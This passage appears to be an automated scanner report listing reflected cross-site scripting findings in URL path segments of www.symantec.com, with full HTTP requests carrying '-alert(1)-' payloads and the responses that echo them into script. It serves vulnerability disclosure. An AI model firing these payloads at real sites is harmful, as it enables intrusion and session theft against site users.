This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites3a449'-alert(1)-'2e6fb3b5c7d/default/themes/connect2/images/sprite-share.png?1 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; s_pers=%20s_nr%3D1297710242902-New%7C1318446242902%3B%20event69%3Devent69%7C1318446242903%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520security%2525253A%25252520blogs%2525253A%25252520updated%25252520w32.stuxnet%25252520dossier%25252520is%25252520available%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fblogs%2525252Fupdated-w32stuxnet-dossier-available%252525231%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:04:30 +0000
Vary: Cookie
ETag: "1297710270"
Content-Type: text/html; charset=utf-8
Content-Length: 33588
X-Varnish: 1477189882
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:04:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites3a449'-alert(1)-'2e6fb3b5c7d/default/themes/connect2/images/sprite-share.png?1';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.34. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-share.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/sprite-share.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f768'-alert(1)-'674b77d5a26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default5f768'-alert(1)-'674b77d5a26/themes/connect2/images/sprite-share.png?1 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; s_pers=%20s_nr%3D1297710242902-New%7C1318446242902%3B%20event69%3Devent69%7C1318446242903%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520security%2525253A%25252520blogs%2525253A%25252520updated%25252520w32.stuxnet%25252520dossier%25252520is%25252520available%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fblogs%2525252Fupdated-w32stuxnet-dossier-available%252525231%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:05:05 +0000
Vary: Cookie
ETag: "1297710305"
Content-Type: text/html; charset=utf-8
Content-Length: 33588
X-Varnish: 1477190360
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:05:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default5f768'-alert(1)-'674b77d5a26/themes/connect2/images/sprite-share.png?1';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.35. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-share.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/sprite-share.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f814f'-alert(1)-'388fcba1a86 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themesf814f'-alert(1)-'388fcba1a86/connect2/images/sprite-share.png?1 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; s_pers=%20s_nr%3D1297710242902-New%7C1318446242902%3B%20event69%3Devent69%7C1318446242903%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520security%2525253A%25252520blogs%2525253A%25252520updated%25252520w32.stuxnet%25252520dossier%25252520is%25252520available%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fblogs%2525252Fupdated-w32stuxnet-dossier-available%252525231%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:05:48 +0000
Vary: Cookie
ETag: "1297710348"
Content-Type: text/html; charset=utf-8
Content-Length: 33588
X-Varnish: 1477190925
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:05:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themesf814f'-alert(1)-'388fcba1a86/connect2/images/sprite-share.png?1';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.36. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-share.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/sprite-share.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad737'-alert(1)-'94a359540ea was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2ad737'-alert(1)-'94a359540ea/images/sprite-share.png?1 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; s_pers=%20s_nr%3D1297710242902-New%7C1318446242902%3B%20event69%3Devent69%7C1318446242903%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520security%2525253A%25252520blogs%2525253A%25252520updated%25252520w32.stuxnet%25252520dossier%25252520is%25252520available%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fblogs%2525252Fupdated-w32stuxnet-dossier-available%252525231%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:06:24 +0000
Vary: Cookie
ETag: "1297710384"
Content-Type: text/html; charset=utf-8
Content-Length: 33588
X-Varnish: 1477191375
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:06:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2ad737'-alert(1)-'94a359540ea/images/sprite-share.png?1';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.37. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-share.png [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/sprite-share.png

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fff6'-alert(1)-'36fd770f751 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/images3fff6'-alert(1)-'36fd770f751/sprite-share.png?1 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; s_pers=%20s_nr%3D1297710242902-New%7C1318446242902%3B%20event69%3Devent69%7C1318446242903%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520security%2525253A%25252520blogs%2525253A%25252520updated%25252520w32.stuxnet%25252520dossier%25252520is%25252520available%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fblogs%2525252Fupdated-w32stuxnet-dossier-available%252525231%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:06:57 +0000
Vary: Cookie
ETag: "1297710417"
Content-Type: text/html; charset=utf-8
Content-Length: 33588
X-Varnish: 1477191880
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:06:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images3fff6'-alert(1)-'36fd770f751/sprite-share.png?1';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.38. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-share.png [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/sprite-share.png

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4c92'-alert(1)-'9b344bd065f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/images/sprite-share.pngf4c92'-alert(1)-'9b344bd065f?1 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; s_pers=%20s_nr%3D1297710242902-New%7C1318446242902%3B%20event69%3Devent69%7C1318446242903%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520security%2525253A%25252520blogs%2525253A%25252520updated%25252520w32.stuxnet%25252520dossier%25252520is%25252520available%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fblogs%2525252Fupdated-w32stuxnet-dossier-available%252525231%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:07:40 +0000
Vary: Cookie
ETag: "1297710460"
Content-Type: text/html; charset=utf-8
Content-Length: 33588
X-Varnish: 1477192445
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=1753
Date: Mon, 14 Feb 2011 19:07:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/sprite-share.pngf4c92'-alert(1)-'9b344bd065f?1';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.39. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-theme.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/sprite-theme.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e0a6'-alert(1)-'cada186826 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites9e0a6'-alert(1)-'cada186826/default/themes/connect2/images/sprite-theme.png?32 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:04:17 +0000
Vary: Cookie
ETag: "1297710257"
Content-Type: text/html; charset=utf-8
Content-Length: 33582
X-Varnish: 1477189684
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:04:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites9e0a6'-alert(1)-'cada186826/default/themes/connect2/images/sprite-theme.png?32';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.40. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-theme.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/sprite-theme.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2f96'-alert(1)-'efe3de756bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/defaultd2f96'-alert(1)-'efe3de756bb/themes/connect2/images/sprite-theme.png?32 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:04:57 +0000
Vary: Cookie
ETag: "1297710297"
Content-Type: text/html; charset=utf-8
Content-Length: 33589
X-Varnish: 1477190258
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:04:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/defaultd2f96'-alert(1)-'efe3de756bb/themes/connect2/images/sprite-theme.png?32';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.41. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-theme.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/sprite-theme.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f65d9'-alert(1)-'8a6603fd441 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themesf65d9'-alert(1)-'8a6603fd441/connect2/images/sprite-theme.png?32 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:05:35 +0000
Vary: Cookie
ETag: "1297710335"
Content-Type: text/html; charset=utf-8
Content-Length: 33589
X-Varnish: 1477190762
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:05:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themesf65d9'-alert(1)-'8a6603fd441/connect2/images/sprite-theme.png?32';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.42. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-theme.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/sprite-theme.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c150a'-alert(1)-'3a1eb976e96 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2c150a'-alert(1)-'3a1eb976e96/images/sprite-theme.png?32 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:06:11 +0000
Vary: Cookie
ETag: "1297710371"
Content-Type: text/html; charset=utf-8
Content-Length: 33589
X-Varnish: 1477191209
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:06:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2c150a'-alert(1)-'3a1eb976e96/images/sprite-theme.png?32';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.43. http://www.symantec.com/connect/sites/default/themes/connect2/images/sprite-theme.png [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/sprite-theme.png

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7aeb8'-alert(1)-'01422918865 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

